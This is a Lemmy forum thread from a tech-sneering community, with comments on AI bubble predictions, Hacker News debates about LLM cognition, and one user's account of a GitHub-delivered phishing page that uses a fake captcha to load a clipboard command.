this post was submitted on 13 Apr 2025
1 points (100.0% liked)

TechTakes

1871 readers
44 users here now

Big brain tech dude got yet another clueless take over at HackerNews etc? Here's the place to vent. Orange site, VC foolishness, all welcome.

This is not debate club. Unless it’s amusing debate.

For actually-good tech, you want our NotAwfulTech community

founded 2 years ago
MODERATORS
 

Need to let loose a primal scream without collecting footnotes first? Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid: Welcome to the Stubsack, your first port of call for learning fresh Awful you’ll near-instantly regret.

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut’n’paste it into its own post — there’s no quota for posting and the bar really isn’t that high.

The post Xitter web has spawned soo many “esoteric” right wing freaks, but there’s no appropriate sneer-space for them. I’m talking redscare-ish, reality challenged “culture critics” who write about everything but understand nothing. I’m talking about reply-guys who make the same 6 tweets about the same 3 subjects. They’re inescapable at this point, yet I don’t see them mocked (as much as they should be)

Like, there was one dude a while back who insisted that women couldn’t be surgeons because they didn’t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can’t escape them, I would love to sneer at them.

(Credit and/or blame to David Gerard for starting this...)

(page 4) 12 comments
sorted by: hot top controversial new old
[–] [email protected] 0 points 1 month ago* (last edited 1 month ago) (5 children)

Today in relevant skeets:

::: spoiler transcript Skeet: If you can clock who this is meant to be instantly you are on the computer the perfect amount. You’re doing fine don’t even worry about it.

Quoted skeet: 'Why are high fertility people always so weird?' A weekend with the pronatalists

Image: Egghead Jr. and Miss Prissy from Looney Tunes Foghorn Leghorn shorts.

load more comments (5 replies)
[–] [email protected] 0 points 1 month ago (6 children)

I got a spam message with a phishing link.... Via Github? Seriously? Are we really doing this?

Not a completely unusual comment.... From the URL it was very obvious that this was a phishing link though. Curiosity got the better of me. The site shows you a "cloudflare" captcha. OK, let's click the checkbox. The usual loading animation starts, then this is shown:

Yeah ok, right....

I'm actually a bit impressed with this, these captchas are so common, I didn't even really think about checking the box. But of course, that interaction means the browser will allow the site to add something to your clipboard.

But like.... Why distribute it via Github? I cannot think of a worse audience to try and con into "paste something random into your windows console". Am I just being naive here? Is this something common I somehow never experienced before?

[–] [email protected] 0 points 1 month ago (1 children)

Getting in early on targeting the vibe coder demographic.

[–] [email protected] 0 points 1 month ago

Oh god

Although... Do you think VideCodersTM read github issues?

load more comments (5 replies)
[–] [email protected] 0 points 1 month ago (3 children)

"Inference Magazine," a substack written by a young man named "Wiseman" who, in the most recent article, says "nuh-uh" to the work of Dr. Bender and co.

https://inferencemagazine.substack.com/

The hackernews thread is a real Bad Philosophy turkey shoot:

https://news.ycombinator.com/item?id=43655780

[–] [email protected] 0 points 1 month ago (1 children)

Orange site really is out here reinventing hard behaviorism.

"We can't directly observe internal states beyond our own subjectivity" -> Let's try to ignore them and see what we get" -> "We've developed a model that doesn't feature internal states as a meaningful element of cognition" -> "there are no internal states" -> "I know I'm a stochastic parrot but what are you?"

load more comments (1 replies)
[–] [email protected] 0 points 1 month ago

some parrots are more stochastic than others

load more comments (1 replies)
[–] [email protected] 0 points 1 month ago (3 children)

Serious question: what are people's specific predictions for the coming VC bubble popping/crash/AI winter? (I've seen that prediction here before, and overall I agree, but I'm not sure about specifics...)

For example... I've seen speculation that giving up on the massive training runs could free up compute and cause costs to drop which the more streamlined and pragmatic GenAI companies could use to pivot to providing their "services" at sustainable rates (and the price of GPUs would drop to the relief of gamers everywhere). Alternatively, maybe the bubble bursting screws up the GPU producers and cloud service providers as well and the costs on compute and GPUs don't actually drop that much if any?

Maybe the bubble bursting makes management stop pushing stuff like vibe coding... but maybe enough programmers have gotten into the habit of using LLMs for boilerplate that it doesn't go away, and LLM tools and plugins persist to make code shittery.

[–] [email protected] 0 points 1 month ago (1 children)

I think we're going to see an ongoing level of AI-enabled crapification for coding and especially for spam. I'm guessing there's going to be enough money from the spam markets to support a level of continued development to keep up to date with new languages and whatever paradigms are in vogue, so vibe coding is probably going to stick around on some level, but I doubt we're going to see major pushes.

One thing that this has shown is how much of internet content "creation" and "communication" is done entirely for its own sake or to satisfy some kind of algorithm or metric. If nobody cares whether it actually gets read then it makes economic sense to automate the writing as much as possible, and apparently LLMs represent a "good enough" ability to do that for plausible deniability and staving off existential dread in the email mines.

[–] [email protected] 0 points 1 month ago

Yeah I also worry the slop and spam is here to stay, it's easy enough to make, of as passable quality for the garbage uses people want from it, and if GPUs/compute go down in price, affordable enough for the spammers and account boosters and karma farmers and such to keep using it.

[–] [email protected] 0 points 1 month ago (4 children)

I've repeated this prediction a bajillion times, but I suspect this bubble's discredited the idea of artificial intelligence, and expect it to quickly die once this bubble bursts.

Between the terabytes upon terabytes of digital mediocrity the slop-nami's given us, LLMs' countless and relentless failures in logic and reason, the large-scale enshittification of daily life their mere existence has enabled, and their power consumption singlehandedly accelerating the climate crisis, I feel that the public's come to view computers as inherently incapable of humanlike cognition/creativity, no matter how many gigawatts they consume or oceans they boil.

Expanding on this somewhat, I suspect AI as a concept will likely also come to be seen as an inherently fascist concept.

With the current bubble's link to esoteric fascism, the far-right's open adoration of slop, basically everything about OpenAI's Studio Ghibli slopgen, and God-knows-what-else, the public's got plenty of reason to treat use or support of AI as a severe indictment of someone's character in and of itself - a "tech asshole signifier", to quote Baldur Bjarnason.

And, of course, AI as a concept will probably come to be viewed as inherently anti-art/anti-artist as well - considering how badly the AI bubble's shafted artists, and artists specifically, that kinda goes without saying.

[–] [email protected] 0 points 1 month ago

I think you are much more optimistic than me about the general public's ability to intellectually understand fascism or think about copyright or give artists their appropriate credit. To most people that know about image gen, it's a fun toy: throw in some words and rapidly get pictures. The most I hope for is that AI image generation becomes unacceptable to use in professional or serious settings and it is relegated to a similar status as clip art.

load more comments (3 replies)
load more comments (1 replies)
load more comments
view more: ‹ prev next ›